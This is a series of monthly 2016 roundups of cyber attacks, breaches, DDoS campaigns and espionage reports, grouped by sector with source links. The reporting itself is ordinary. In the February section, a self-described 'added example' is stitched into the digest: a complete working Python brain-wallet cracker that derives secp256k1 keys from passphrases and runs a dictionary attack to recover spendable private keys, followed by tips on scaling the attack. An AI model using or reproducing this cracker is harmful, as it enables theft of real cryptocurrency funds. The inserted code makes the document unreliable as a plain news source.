August has been equally challenging with regard to security-related issues.
The number of hacks has been growing consistently, emphasising that cyber security must be taken seriously by organisations of every kind.
The attacks have been profound, making them tough for firms and government bodies to deal with. Here is a glimpse of what happened through the month.
Government and Allied Sectors:
F-Secure reveals the details of NanHaiShu, a spy campaign aimed at accessing information from high-profile targets involved in the South China Sea dispute. (1)
Anderson County government officials and the sheriff’s office investigate a possible computer security breach (a “potential system-wide breach” of the main courthouse server) involving 1,800 people. (2)
The Municipality of Ede reveals that on 8 July it discovered that the personal information of about 3,700 Ede residents had been accessed by unauthorized persons because of a security vulnerability on the municipal site. (3)
An anonymous group calling itself the Shadow Brokers publishes what it claims are sophisticated software tools belonging to an elite hacking team tied to the US National Security Agency, known as “The Equation Group”. Further analysis confirms the link with the state-sponsored crew. (4)
Unknown attackers launch a massive attack aimed at flooding targeted .gov email inboxes with subscription requests to thousands of email lists. (5)
The local council of the Australian city of Brisbane loses A$450,000 (£248,000, US$334,000, EUR 293,000) from email-whaling scammers who trick staff into wiring money into their bank accounts. (6)
Banking, Finance and Allied Sectors:
The price of bitcoin plummets after Hong Kong-based digital currency exchange Bitfinex is hit by hackers who steal $65m (£48m, €57m) of the digital currency. (7)
The central bank of Thailand (BoT) issues a warning to the country’s commercial banks about security vulnerabilities in roughly 10,000 NCR ATMs that were exploited by an Eastern European gang of cybercriminals to steal 12 million baht (£260,000, $350,000). (8)
SWIFT discloses new hacking attacks on its member banks as it pressures them to comply with security procedures instituted after February’s high-profile $81 million heist at Bangladesh Bank. In a private letter to clients, SWIFT says that new cyber-theft attempts, some of them successful, have surfaced since June, when it last updated customers on the string of attacks discovered after the Bangladesh central bank heist. (9)
Accounting firm Presnell Gage notifies about 100 individuals or companies that their information may have been hacked during a data breach in the past month, and fraudulent tax returns filed. (10)
Online and Ecommerce Services:
Peace, the hacker who previously sold dumps of Myspace and LinkedIn credentials, lists 200 million supposed Yahoo user credentials on The Real Deal marketplace. Yahoo confirms it is aware of the claim. (11)
Kimpton Hotels and Restaurants advises guests of a possible credit card breach. (12)
123-Reg is taken down by a massive DDoS attack. (13)
Arizona healthcare group Banner Health reveals that hackers may have accessed records of 3.7 million of its customers. The attack was initiated on 17 June. (14)
The New York State Psychiatric Institute notifies 21,880 research participants of a hack that happened between April and May. (15)
The PoodleCorp collective claims to have taken down the EA servers shortly after the open beta for upcoming shooter Battlefield 1 went live. (16)
Online password manager OneLogin is breached. Specifically, its Secure Notes facility was compromised, allowing the intruder to read in cleartext notes edited between 2 June and 25 August this year. (17)
About 71,000 user accounts and IP addresses are leaked from Minecraft fan website Minecraft World Map. The dump includes email addresses, IP address data, usernames and passwords. (18)
Motherboard reveals that about 50,000 subscriber accounts for media company Infowars are being traded in the digital underground. The company admits the data was dumped from a breach that occurred in 2012. (19)
References:
- https://labsblog.f-secure.com/2016/08/04/nanhaishu-rating-the-south-china-sea/
- http://wate.com/2016/08/10/1800-possibly-affected-by-anderson-county-government-computer-breach/
- http://www.nltimes.nl/2016/08/11/personal-data-3700-ede-residents-leaked-municipal-site/
- http://arstechnica.com/security/2016/08/code-dumped-online-came-from-omnipotent-nsa-tied-hacking-group/
- http://krebsonsecurity.com/2016/08/massive-email-bombs-target-gov-addresses/
- http://www.theregister.co.uk/2016/08/16/brisbane_councillors_lose_500k_to_scammers/
- http://www.ibtimes.co.uk/bitcoin-price-drops-hackers-steal-65m-honk-kong-based-bitfinex-1573950
- http://www.ibtimes.co.uk/thai-bank-shuts-down-half-its-atms-after-eastern-european-cyber-gang-heist-1577806
- http://www.reuters.com/article/us-cyber-heist-swift-idUSKCN11600C
- https://www.databreaches.net/id-accounting-firm-presnell-gage-reports-data-security-breach/
- http://motherboard.vice.com/read/yahoo-supposed-data-breach-200-million-credentials-dark-web
- http://www.scmagazine.com/kimpton-hotel-chain-investigating-possible-breach/article/514080/
- http://www.ibtimes.co.uk/123-reg-hit-huge-scale-ddos-attack-that-left-websites-email-services-offline-1574069
- http://www.ibtimes.co.uk/banner-health-cyberattack-hackers-may-have-accessed-3-7-million-customers-records-1574186
- https://www.databreaches.net/new-york-state-psychiatric-institute-notifies-21880-research-participants-of-hack/
- http://www.ibtimes.co.uk/eas-online-servers-brought-down-following-ddos-attack-claimed-by-hacker-group-poodlecorp-1579073
- http://www.theregister.co.uk/2016/08/31/onelogin_breached_hacker_finds_cleartext_credential_notepads/
- http://www.theregister.co.uk/2016/08/30/71000_minecraft_world_map_accounts_leak/
- http://motherboard.vice.com/read/infowars-accounts-hacked-prison-planet-alex-jones
The number of database hacks keeps growing in 2016, covering diverse sectors.
The list of notable victims this month includes ubuntuforums.org (2 million accounts leaked), Netia (a Polish ISP whose entire customer base was leaked), Shadi.com (a dating website that suffered the leak of 2 million accounts), the media company Penton (5 databases leaked, for a total of 1.4 million passwords) and MTN Irancell (a really massive one, since the leaked data covers 20 million customers). Now let us take a look at the usual sectors.
Government and Allied Sectors:
A hacker called aLem! defaces the websites of Arizona State, the Arizona House of Representatives and the Arizona State Legislature. (1)
Guccifer 2.0 leaks more documents from the computer networks of the US Democratic Party and exposes plans to spend more than $800,000 (£614,660) on a “counter-convention” in an attempt to hijack the upcoming Republican National Convention (RNC). (2)
The official Twitter account for NASA’s Kepler (@NASAKepler) is hacked and posts an offending image and a dodgy link. (3)
In the name of #ZimShutDown2016 or #ShutDownZimbabwe, Anonymous takes down the websites of the country’s official portal (zim.gov.zw), the Zimbabwe African National Union – Patriotic Front (Zanu-PF) and the Zimbabwe Broadcasting Corporation (zbc.co.zw). (4)
In retaliation for the Alton Sterling killing, a hacker called @0x2Taylor hacks the Baton Rouge city government’s servers and leaks 50,000 Baton Rouge Police records. (5)
Cymmetria Research releases a new report about a new APT dubbed “Patchwork” tied to Southeast Asia and the South China Sea, targeting governments and entities around the world including the U.S. (6)
Kaspersky Lab researchers reveal the details of a threat actor undertaking aggressive cyber-espionage activity in the Asian region, targeting multiple diplomatic and government entities with a particular focus on China and its international affairs. The group is dubbed Dropping Elephant or Chinastrats. (7)
On the same day the Permanent Court of Arbitration in The Hague rules for the Philippines in its dispute with China over islands in the West Philippine Sea, 69 Philippine government websites are taken down by a DDoS attack. (8)
A report published by the House Committee on Science, Space and Technology finds that hackers purportedly from China compromised computers at the Federal Deposit Insurance Corporation repeatedly between 2010 and 2013. The incidents were never reported. (9)
Guccifer 2.0 leaks more documents reportedly stolen from the computer networks of the Democratic National Committee (DNC), including opposition research, political donor lists and internal memos. (10)
Banking, Finance and Allied Sectors:
Hacker group OurMine claims to have temporarily taken down HSBC’s servers in the US and the UK. (11)
The top eight banks in Taiwan have been forced to shut down activity on hundreds of ATMs after a coordinated group of thieves used malware to steal NT$70 million ($2.17m, £1.64m, €1.9m) in cash. (12)
TrapX releases a new report revealing the details of three new attacks related to Medjack, an attack that relies on exploiting existing medical devices running outdated software in order to enter the secure network of a healthcare organisation. (13)
TheDarkOverlord puts up for sale a new healthcare database containing the data of about 24,000 patients. (14)
Online and Ecommerce Services:
0x2Taylor claims to have breached the servers of Amazon, and leaks the login credentials of 80,000 Kindle users. The company denies the breach and declares the data was not stolen from its servers and is not legitimate. (15)
Beggars Group, home of independent music labels 4AD, Matador, Rough Trade Records, XL Recordings and Young Turks, warns US customers of a data breach. People who purchased any products from the websites for the aforementioned labels between 28 April 2015 and 4 May 2016 may have been victims of the data breach. (16)
Interpark becomes aware that its systems were infiltrated and that the names, addresses and phone numbers of roughly 10.3 million customers were stolen two months earlier. The attack is allegedly the work of North Korea. (17)
An unknown hacker breaches the official forum of the popular mobile game “Clash of Kings” and makes off with close to 1.6 million accounts. The hack was carried out on 14 July. (18)
Reports surface of a possible data breach at the magazine clearing house GunMag Warehouse. (19)
References:
- https://www.hackread.com/turkish-hacker-hacks-arizona-state-websites/
- http://www.ibtimes.co.uk/dnc-hack-guccifer-2-0-leaks-democratic-party-counter-convention-plans-protest-republican-event-1569410
- http://gizmodo.com/nasa-kepler-twitter-account-hacked-tweets-sexy-butt-1783194462
- https://www.hackread.com/anonymous-ddos-zimbabwe-government-sites/
- http://www.dailydot.com/layer8/alton-sterling-baton-rouge-website-hack/
- https://threatpost.com/apt-group-patchwork-cuts-and-pastes-a-potent-attack/119081/
- https://www.helpnetsecurity.com/2016/07/11/cyber-espionage-low-profile-tools-high-profile-targets/
- http://news.softpedia.com/news/philippines-government-websites-hit-by-massive-ddos-attacks-china-suspected-506412.shtml
- http://arstechnica.com/security/2016/07/fdic-was-hacked-by-china-and-cio-covered-it-up/
- http://www.ibtimes.co.uk/dnc-hacker-guccifer-2-0-leaks-files-sarah-palin-convicted-democratic-party-donors-1570697
- http://www.ibtimes.co.uk/ourmine-hackers-claim-have-targeted-cyberattack-hsbc-severs-1570530
- http://www.ibtimes.co.uk/banks-across-taiwan-high-alert-suspected-russian-criminals-use-atm-malware-steal-millions-1570185
- http://news.softpedia.com/news/hospitals-targeted-in-new-wave-of-medjack-attacks-505882.shtml
- https://www.databreaches.net/another-healthcare-database-hacked-and-put-up-for-sale/
- http://www.dailydot.com/debug/amazon-hack-80000-passwords-usernames/
- https://www.theguardian.com/music/2016/jul/20/beggars-group-warning-indie-label-security-hack-4ad-matador-xl
- http://www.ibtimes.co.uk/north-korea-accused-hacking-extorting-south-korean-amazon-1573020
- http://www.zdnet.com/article/hacker-steals-forums-of-clash-of-kings-mobile-game/
- http://www.scmagazine.com/possible-breach-at-gunmag-warehouse/article/511780/
Government and Allied Sectors:
A hacker using the pseudonym NSA puts up for sale on the dark web a database that purports to hold over a quarter of a million driver licence records compromised from government-linked databases in Louisiana, United States. (1)
Russian government hackers penetrate the computer network of the Democratic National Committee and gain access to the entire database, dumping a 231-page document purporting to be opposition research into Donald Trump. (2)
Palo Alto Networks reveals the details of a cyberespionage group called Sofacy, which has launched a fresh attack against the US government, using a “new persistence mechanism” designed to help evade detection. (3)
The Vermont Fish and Wildlife Department (FWD) posts a notice of a suspected security breach related to the online purchase of licenses and tags from the Department. (4)
Banking, Finance and Allied Sectors:
Hackers affiliated with the Anonymous collective claim to have taken down the London Stock Exchange website in the name of OpIcarus. (5)
A massive DDoS attack hits BitGo, a service that describes itself as the most secure Bitcoin wallet solution available today. (6)
In the name of Project Mayhem, phase 3 of OpIcarus, Anonymous takes down the official website of the Bilderberg Group, a controversial and highly secretive conference attended by the so-called ‘political elite’ alongside experts from academia and finance. (7)
As part of the same operation, Anonymous takes down the Romanian stock exchange Sibex (sibex.ro). (8)
Online and Ecommerce Services:
Scrum.org contacts users to warn them of a security breach: unknown attackers took control of its web server to hijack initial password-configuration emails. (9)
Users of the remote login service TeamViewer report that their computers have been ransacked by attackers who somehow gained access to their accounts. (10)
51 Million user accounts for iMesh, a now defunct file sharing service, are put on sale on the dark web. (11)
References:
- http://www.ibtimes.co.uk/hacker-puts-290000-driver-licence-records-sale-dark-web-stolen-government-computers-1564581
- https://www.washingtonpost.com/world/national-security/russian-government-hackers-penetrated-dnc-stole-opposition-research-on-trump/2016/06/14/cf006cb4-316e-11e6-8ff7-7b6c1998b7a0_story.html
- http://www.ibtimes.co.uk/us-government-targeted-new-malware-by-cyberespionage-group-sofacy-1565552
- https://www.databreaches.net/vermont-fish-and-wildlife-reports-license-data-breach/
- http://www.dailymail.co.uk/news/article-3625656/Hackers-attack-Stock-Exchange-Cyber-criminals-website-two-hours-protest-against-world-s-banks.html
- http://news.softpedia.com/news/ddos-attack-on-bitgo-bitcoin-wallet-sends-shockwaves-through-the-industry-504887.shtml
- http://www.ibtimes.co.uk/anonymous-targets-bilderberg-group-opicarus-transforms-into-project-mayhem-1564629
- http://www.ibtimes.co.uk/anonymous-targets-bilderberg-group-opicarus-transforms-into-project-mayhem-1564629
- http://www.theregister.co.uk/2016/06/01/scrumorg_hacked_may_have_lost_crypto_keys_and_some_user_data/
- http://arstechnica.com/security/2016/06/teamviewer-says-theres-no-evidence-of-2fa-bypass-in-mass-account-hack/
- http://www.zdnet.com/article/51-million-imesh-file-sharing-accounts-for-sale-dark-web/
As summer approaches in May, we continue to focus on government, banking and online services as our major sectors.
Cyberattacks during May have hit almost every sector. The biggest concern, however, has been the SWIFT attacks, with the investigation now extended to 12 more banks. Read on.
Government and Allied Sectors:
The identities of members of an elite Swiss special forces army unit are revealed in a hack of the defence contractor RUAG. (1)
San Juan County reports that the information of patients in the county’s DWI treatment program may have been compromised after an attacker gained remote access to one of its computers. (2)
The Statistical Centre of Iran is targeted by unknown attackers. Iran traces the attack to three Arab countries, including Saudi Arabia. (3)
Complete Chiropractic & Bodywork Therapies notifies 4,082 patients after discovering that malware had been injected into its systems in November 2015. (4)
Banking, Finance and Allied Sectors:
Unknown individuals access Equifax’s W2Express website and steal tax and salary data. (5)
OpIcarus continues, and this time the hacktivists of the Anonymous collective take down the Central Bank of Cyprus (centralbank.gov.cy). (6)
A 10GB file that purports to hold sensitive financial data on tens of thousands of customers of UAE Investbank is published online. A Turkish group dubbed Bozkurtlar claims responsibility for the attack. (7)
OpIcarus continues and Anonymous takes down other central banks around the world, including the Central Bank of the Dominican Republic, the Guernsey Financial Services Commission, the Central Bank of Maldives, the Dutch Central Bank, the National Bank of Panama, the Central Bank of Kenya, the Central Bank of Mexico and the Central Bank of Bosnia and Herzegovina. Special mention of the month: in the name of OpIcarus, Anonymous-affiliated hackers continue their DDoS campaign against international financial institutions, attacking 18 banks between 13 and 19 May. Targets include the New York Stock Exchange, the Bank of Scotland, the Bank of France and five US Federal Reserve branches, among others. (8)
The investigation into the attempted $1 billion electronic heist at the Central Bank of Bangladesh expands to as many as 12 more banks, all of which use the SWIFT payment network. (9)
Online and Ecommerce Services:
Malwarebytes reveals the details of a malvertising campaign targeting visitors to two TV stations (KMOV and WBTV) affiliated with the American CBS TV network. (10)
Babycare retailer Kiddicare warns customers that 795,000 records of personal data shared with the store have been stolen by hackers. (11)
SonnySpooks hacks paypalsucks.com and dumps 82,169 records with usernames and hashed passwords.
Fiverr suffers a six-hour DDoS attack after removing DDoS-for-hire listings. (12)
A black hat hacker dubbed @TehBVM takes over random subreddits, removing moderators and changing each subreddit’s CSS style, leaving a defacement message behind. (13)
A hacker who goes by the nickname Amar^SHG (formerly Kuroi’SH) defaces France’s most visited weather portal, Météo France. (14)
References:
- http://www.swissinfo.ch/eng/ruag-affair_sensitive-personal-information-likely-hacked/42140796
- http://www.scmagazine.com/san-juan-county-dwi-program-patient-data-compromised/article/497945/
- http://www.ibtimes.co.uk/iran-cyber-police-claim-saudi-arabia-behind-hacking-government-website-1562673
- https://www.databreaches.net/mi-complete-chiropractic-bodywork-therapies-notified-4082-patients-after-discovering-malware/
- http://krebsonsecurity.com/2016/05/crooks-grab-w-2s-from-credit-bureau-equifax/
- https://www.hackread.com/oplcarus-hacktivists-ddos-central-bank-of-cyprus/
- http://www.ibtimes.co.uk/investbank-uae-hack-database-containing-credit-card-details-passport-scans-leaks-online-1558730
- http://www.ibtimes.co.uk/opicarus-ny-stock-exchange-us-federal-reserve-many-financial-institutions-attacked-by-anonymous-1560836
- http://arstechnica.com/security/2016/05/12-more-banks-now-being-investigated-over-bangladeshi-swift-heist/
- http://motherboard.vice.com/read/fbi-flash-alert-hacking-group-has-had-access-to-us-govt-files-for-years
- http://www.theregister.co.uk/2016/05/09/kiddicare_data_breach/
- http://news.softpedia.com/news/fiverr-suffers-six-hour-ddos-attack-after-removing-ddos-for-hire-listings-504570.shtml
- http://news.softpedia.com/news/hacker-hijacks-and-defaces-countless-subreddits-just-for-fun-503951.shtml
- http://news.softpedia.com/news/hacker-defaces-m-t-o-france-website-with-anti-war-message-504714.shtml
Government and Allied Sectors:
A group of Turkish hackers going by the online handle Turk Hack Team (THT) defaces several Armenian government servers, asserting claims over the Nagorno-Karabakh region. (1)
Turkish authorities investigate the alleged leak of nearly 50 million citizens’ sensitive personal data (almost two-thirds of the country’s 75 million-strong population). According to reports, a database uploaded online appears to have been stolen in 2009 from the state agency that issues national ID cards. (2)
In an unusual move, the FBI warns that “a group of malicious cyber actors”, whom security experts believe to be the government-sponsored hacking group known as APT6, has compromised and stolen sensitive information from various government and commercial networks since at least 2011. (3)
Although the official explanation is a solar storm, Sweden privately suspects that a hacker group linked to Russian intelligence was responsible for an attack on its air traffic control systems last November. (4)
The Cyber Justice Team claims responsibility for a big hack of Syrian government networks, which results in a massive 43GB data leak online. (5)
Up to 831 members of Britain’s defence community with high-level security clearances had their personally identifying information stolen when the Ministry of Defence’s business networking organisation was hacked in November 2015 via the compromise of Niteworks, an MoD contractor. (13)
Members of the New World Hackers (NWH), one of Anonymous’ divisions, launch a DDoS attack against the city of Denver’s website (denvergov.org). (14)
Banking, Finance and Allied Sectors:
A phishing attack compromises the identities of more than 2,100 employees of Olympia School District. (6)
Anonymous takes down the Dalhousie University website over a 2015 rape case, demanding punishment for the culprits. (7)
British government-funded educational network Janet is hit by a DDoS attack. (8)
Solano Community College is hit by a spear-phishing attack that compromises the W-2 information of about 1,200 staffers. (16)
CoinWallet is forced to shut down its operations by 1 May 2016 after a data breach. (17)
Fourteen school systems, 3 in Alabama and 11 in Mississippi, are affected by a breach at Innovak International involving employee data. (18)
Documents purporting to be from the Qatar National Bank are leaked on the file-sharing site Cryptome.org. According to Cryptome, the leaked file contains more than 15,000 documents detailing more than 100,000 accounts with passwords and PINs. (19)
Online and Ecommerce Services:
The staggering 2.6 TB leak from law firm Mossack Fonseca, known as the Panama Papers, appears to stem from a hack exploiting a WordPress vulnerability. (9)
Coinroll Bitcoin Casino admits that several users had the funds in their online accounts stolen. The breach may be related to an unprotected MongoDB instance. (10)
dōTERRA notifies several customers and distributors of a possible data breach involving a third party that provides it with hosting and software services. (11)
Identity thieves steal tax and salary data from payroll giant ADP by registering accounts in the names of employees at more than a dozen customer firms. ADP says the incidents occurred because the victim companies all mistakenly published sensitive ADP account information online, making those firms easy targets for tax fraudsters. (12)
LuckyPet notifies the California State Attorney General’s office of a data breach that compromised online customer information. (15)
References:
- https://www.hackread.com/cyberwar-turkish-vs-armenian-hackers/
- http://arstechnica.co.uk/security/page/3/
- http://motherboard.vice.com/read/fbi-flash-alert-hacking-group-has-had-access-to-us-govt-files-for-years
- http://www.theregister.co.uk/2016/04/12/sweden_suspects_russian_hackers_hit_air_traffic_control/
- http://www.infosecurity-magazine.com/news/massive-syrian-government-hack/
- http://www.scmagazine.com/olympia-school-district-employee-data-compromised-in-phishing-attack/article/489911/
- https://www.hackread.com/anonymous-ddos-dalhousie-university-site-halifax-rape-case/
- http://www.theregister.co.uk/2016/04/18/janet_clobbered_with_ddos_attacks_again/
- http://www.theregister.co.uk/2016/04/05/email_server_hack_led_to_mossack_fonseca_leak/
- http://news.softpedia.com/news/bitcoin-casino-stolen-user-funds-may-be-linked-to-unprotected-mongodb-database-503090.shtml
- https://www.databreaches.net/doterra-letter-informs-customers-of-possible-data-breach/
- http://krebsonsecurity.com/2016/05/fraudsters-steal-tax-salary-data-from-adp/#more-34704
- http://www.theregister.co.uk/2016/04/22/mod_contractor_hacked_831_members_of_defence_community_exposed/
- http://news.softpedia.com/news/anonymous-shuts-down-city-of-denver-website-after-another-fatal-police-shooting-503371.shtml
- http://www.scmagazine.com/luckypet-data-breach-compromises-online-payment-info/article/492470/
- http://www.scmagazine.com/1206-solano-community-college-employees-victimized-in-w-2-data-breach/article/493732/
- https://www.hackread.com/bitcoin-trader-quits-operation-due-to-cyber-attack/
- http://www.databreaches.net/fourteen-school-systems-impacted-by-innovak-intl-breach-irs/
- http://www.theregister.co.uk/2016/04/25/breaking_qatar_bank_hack/
Government and Allied Sectors:
A new report from Trend Micro reveals that the Russian group behind Operation Pawn Storm is targeting several offices in Turkey. (1)
Finland’s foreign minister Erkki Tuomioja reveals to the media that the foreign ministry’s computer network has been infiltrated by spies. The breach has apparently been going on for four years, with suspicion directed at Russia or China. (2)
Chinese security researchers from cyber-security vendor Qihoo 360 reveal the details of a malicious actor named OnionDog that has been targeting Korean-speaking countries since October 2013. (3)
Hackers from the New World Hackers group (NWH) claim to have taken down the official websites of the Salt Lake City police, the airport, First Utah Bank and Downtown Alliance in protest against the shooting of the teenager Abdi Mohamed. (4)
AnonymousCorrupt, a group of hacktivists linked to Anonymous, claims to have taken down the nasa.gov website. (5)
The database of the Philippine Commission on Elections (COMELEC) is breached and the personal information of 55 million voters is potentially exposed in two consecutive attacks. (6)
In the name of #OpLusofonia, the Portuguese branch of Anonymous defaces 28 Angolan government websites in retaliation for the recent sentencing of 17 activists. (7)
Banking, Finance and Allied Sectors:
Members of @TheFamilyMethod claim to have hacked the Bank of North Dakota and dump the records of 124 transactions. (8)
Moneytree is the latest company to alert current and former employees that their tax data, including Social Security numbers, salary and address information, was accidentally handed over directly to scam artists. (9)
Reuters reports that unknown hackers were able to breach Bangladesh Bank’s systems and steal its credentials for payment transfers, using them to transfer money to entities in the Philippines and Sri Lanka. The hackers got away with about $80 million, but a spelling mistake helped prevent the theft of nearly $1 billion more. (10)
American Express warns some customers that their personal details may have been exposed in a data breach at a third-party service provider. (11)
BitQuick announces it is shutting down its server following an attack that gave the attacker unauthorized administrative access; all funds, IDs and emails reportedly remain secure. (12)
After a sustained wave of DDoS attacks, the Bitcoin startup Coinkite Inc. officially announces the shutdown of its secure wallet service. (13)
Online and Ecommerce Services:
Malwarebytes reveals the details of a malvertising campaign distributing the infamous Angler Exploit Kit and targeting likes.com and livejournal.com, two popular social networking sites with 110M and 140M visitors per month respectively. (14)
Clothing retailer SportPursuit is hit by hackers over the Easter weekend, potentially losing customers’ bank card details. (15)
Administrators of the vBulletin forums start a site-wide password reset after an unknown attacker gained access to one of their servers. (16)
SonnySpooks hacks buzzmachines.com and dumps nearly 37,000 usernames and passwords. (17)
Metropolis hacks allosambre.com and dumps 1,535 usernames and cleartext passwords. (18)
A flurry of ransomware attacks against hospitals in recent weeks suggests that online criminals may have found a new favourite target for cyber-extortion. (19)
References:
- http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-adds-turkey-list-targets/
- http://www.scmagazine.com/finlands-foreign-ministry-hacked-by-russian-or-chinese-spies/article/481968/
- http://news.softpedia.com/news/korean-energy-and-transportation-targets-attacked-by-oniondog-apt-501534.shtml
- https://www.hackread.com/salt-lake-city-police-airport-websites-ddos-attacks/
- https://www.hackread.com/hackers-ddos-shutdown-nasa-website-email-server/
- http://www.infosecurity-magazine.com/news/every-voter-in-philippines-exposed/
- http://news.softpedia.com/news/anonymous-attacks-angolan-government-in-response-to-the-jailing-of-17-activists-502479.shtml
- http://www.databreaches.net/hackers-claim-bank-of-north-dakota-hacked/
- http://krebsonsecurity.com/2016/03/thieves-phish-moneytree-employee-tax-data/
- http://uk.reuters.com/article/us-usa-fed-bangladesh-typo-insight-idUKKCN0WC0TC
- http://www.techinsider.io/american-express-breach-2016-3
- http://www.databreaches.net/bitquick-shuts-down-after-security-breach-seeks-new-management/
- https://www.hackread.com/bitcoin-exchange-ddos-attacks/
- https://blog.malwarebytes.org/threat-analysis/2016/03/social-sites-likes-and-livejournal-hit-with-malvertising/
- http://www.theregister.co.uk/2016/03/29/hackers_score_data_attack_sportpursuit/
- http://news.softpedia.com/news/vbulletin-servers-hacked-admins-force-password-reset-for-all-users-502331.shtml
- https://hacked-emails.com/leak/siph0n-4560
- https://hacked-emails.com/leak/pb-tpZP8ea3
- http://www.darkreading.com/attacks-breaches/multiple-hospitals-hit-in-ransomware-attack-wave/d/d-id/1324820
Source: http://hackmegaddon.com
Government and Allied Sectors:
In the name of #OpAfrica and #OpMonsanto, hackers from World Hacker Team breach South Africa’s Department of Water Affairs (DWA) and leak the data of 5,800 government employees. (1)
In the name of #OpAfrica, Anonymous dumps the names, phone numbers, email addresses and hashed passwords of more than 1,000 government employees. (2)
A group of Chilean hacktivists going by the name Chilean Hackers breaks into the database of CONADI and steals the personal details of 304,189 Chilean citizens seeking state benefits from the country’s government. (3)
The US Internal Revenue Service is targeted by an attack that obtains electronic tax-return credentials for 101,000 Social Security numbers. The attack is carried out using personal data stolen from an external source. (4)
#OpAfrica continues with the dump of the details of 220 government employees from Uganda’s Ministry of Finance. (5)
In protest against the French arms trade, Anonymous hacks into one of the web portals managed by France’s Ministry of Defense (outils.cimd.interarmees.defense.gouv.fr). (6)
In the name of #OpGreenRights, the Italian branch of the Anonymous collective takes down the websites of local authorities in Apulia and Basilicata for participating in the Trans Adriatic Pipeline (TAP) project. (7)
Members of Anon Verdict, a sub-division of the Anonymous hacker collective, leak the details of 52 officers and employees of the Cincinnati Police Department. The Police Department questions the validity of the hack. (8)
Banking and Allied Sectors:
The website of Coast Central Credit Union, a financial institution serving more than 60,000 customers, is hacked and a backdoor is implanted. (9) Kaspersky Lab reveals the details of ATMZombie, a banking trojan targeting Israeli bank customers: it abuses a loophole in one of the banks' online features, and the stolen funds are then physically withdrawn from ATMs. (10)
The Cyber Crime Department of the Russian Interior Ministry reveals the details of an operation that stole about 1.5 billion roubles ($19.8 million) from several dozen Russian banks during 2015 via compromised Visa and MasterCard payment systems. (11) Bloomberg reveals that hackers used malware to penetrate the defences of Energobank, a Russian regional bank, and moved the rouble-dollar rate by more than 15 percent in minutes, according to Group-IB, the Moscow-based security firm hired to investigate the attack. The malware used is Corkow, also known as Metel. (12)
Research reveals that attackers have siphoned about $103,000 out of Bitcoin accounts protected by so-called "brain wallets", in which the private key is derived from a passphrase the owner memorises instead of being a randomly generated 64-character key. Because the key is only as strong as the passphrase, weak or well-known passphrases can be recovered by password cracking and the funds swept. (13)
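The brain-wallet weakness described above, as an added example that is not part of the original report or of the cited research: a pure-Python reimplementation of the classic derivation (private key = SHA-256 of the passphrase, public key via secp256k1 scalar multiplication) and the dictionary attack that turns a guessable passphrase into a spendable key. The victim passphrase, the wordlist and the point arithmetic are constructed for the demo; the only external constants are the public secp256k1 curve parameters.

```python
import hashlib

# secp256k1 domain parameters (the curve Bitcoin uses)
P = 2**256 - 2**32 - 977
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def _point_add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                      # p1 == -p2
    if p1 == p2:                         # doubling: tangent slope
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:                                # addition: chord slope
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return x3, y3


def _scalar_mult(k, point):
    """Double-and-add scalar multiplication. Not constant-time: fine for a
    cracker, never use it to sign with a real key."""
    result = None
    addend = point
    while k:
        if k & 1:
            result = _point_add(result, addend)
        addend = _point_add(addend, addend)
        k >>= 1
    return result


def brainwallet_privkey(passphrase: str) -> int:
    """Classic brain-wallet derivation: the private key is just SHA-256(passphrase).
    No salt, no stretching, so every candidate costs one hash plus one EC multiply."""
    key = int.from_bytes(hashlib.sha256(passphrase.encode("utf-8")).digest(), "big")
    if not 1 <= key < N:
        raise ValueError("hash is not a valid secp256k1 scalar")
    return key


def compressed_pubkey(privkey: int) -> str:
    """33-byte SEC1 compressed public key (02/03 prefix + x coordinate), hex."""
    x, y = _scalar_mult(privkey, G)
    prefix = b"\x02" if y % 2 == 0 else b"\x03"
    return (prefix + x.to_bytes(32, "big")).hex()


def crack_brainwallet(target_pubkey_hex: str, candidates):
    """Dictionary attack: derive a key from each candidate passphrase and compare
    the public key with the one observed on the blockchain. Returns the
    passphrase on a hit, else None."""
    for phrase in candidates:
        if compressed_pubkey(brainwallet_privkey(phrase)) == target_pubkey_hex:
            return phrase
    return None


# Constructed demo data: a "victim" who chose a famous passphrase, and a tiny wordlist.
VICTIM_PASSPHRASE = "correct horse battery staple"
VICTIM_PUBKEY = compressed_pubkey(brainwallet_privkey(VICTIM_PASSPHRASE))
WORDLIST = ["password", "letmein", "bitcoin", "correct horse battery staple"]

if __name__ == "__main__":
    print("victim pubkey:", VICTIM_PUBKEY)
    print("recovered passphrase:", crack_brainwallet(VICTIM_PUBKEY, WORDLIST))
```

A real attacker compares against the hash160 address rather than the raw public key and runs the wordlist on a GPU, but the economics are the same as shown here: an unsalted, unstretched hash of a human-chosen phrase is a password hash, and it is cracked like one.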
Ecommerce and Online Services:
Incipio, LLC notifies an unspecified number of customers that malware compromised orders placed online. (14) Bravewanderer hacks techfactory.net and dumps 15,601 usernames and clear-text passwords. (15)
@0x1Taylor hacks teksyndicate.com and dumps more than 30,000 records with usernames and hashed passwords. (16) Team Fursec hacks differencegames.com and dumps 16,589 usernames and hashed passwords. (17) A hacker on the dark-web forum Hell claims to have sold the email addresses and plaintext passwords of over 27 million users of the dating site Mate1.com. (18)
- http://news.softpedia.com/news/anonymous-hacks-south-african-department-of-water-affairs-500412.shtml
- http://www.infosecurity-magazine.com/news/anonymous-hacks-south-african/
- http://news.softpedia.com/news/hacktivists-leak-details-for-300-000-chilean-citizens-looking-for-state-benefits-500232.shtml
- http://arstechnica.com/tech-policy/2016/02/irs-website-attack-nets-e-filing-credentials-for-101000-taxpayers/
- http://news.softpedia.com/news/anonymous-turns-its-sights-to-africa-uganda-and-rwanda-targets-are-hit-first-500010.shtml
- http://news.softpedia.com/news/anonymous-hacks-french-defense-ministry-website-to-protest-arms-trade-500804.shtml
- http://news.softpedia.com/news/anonymous-attacks-italian-government-site-because-of-gas-pipeline-project-500977.shtml
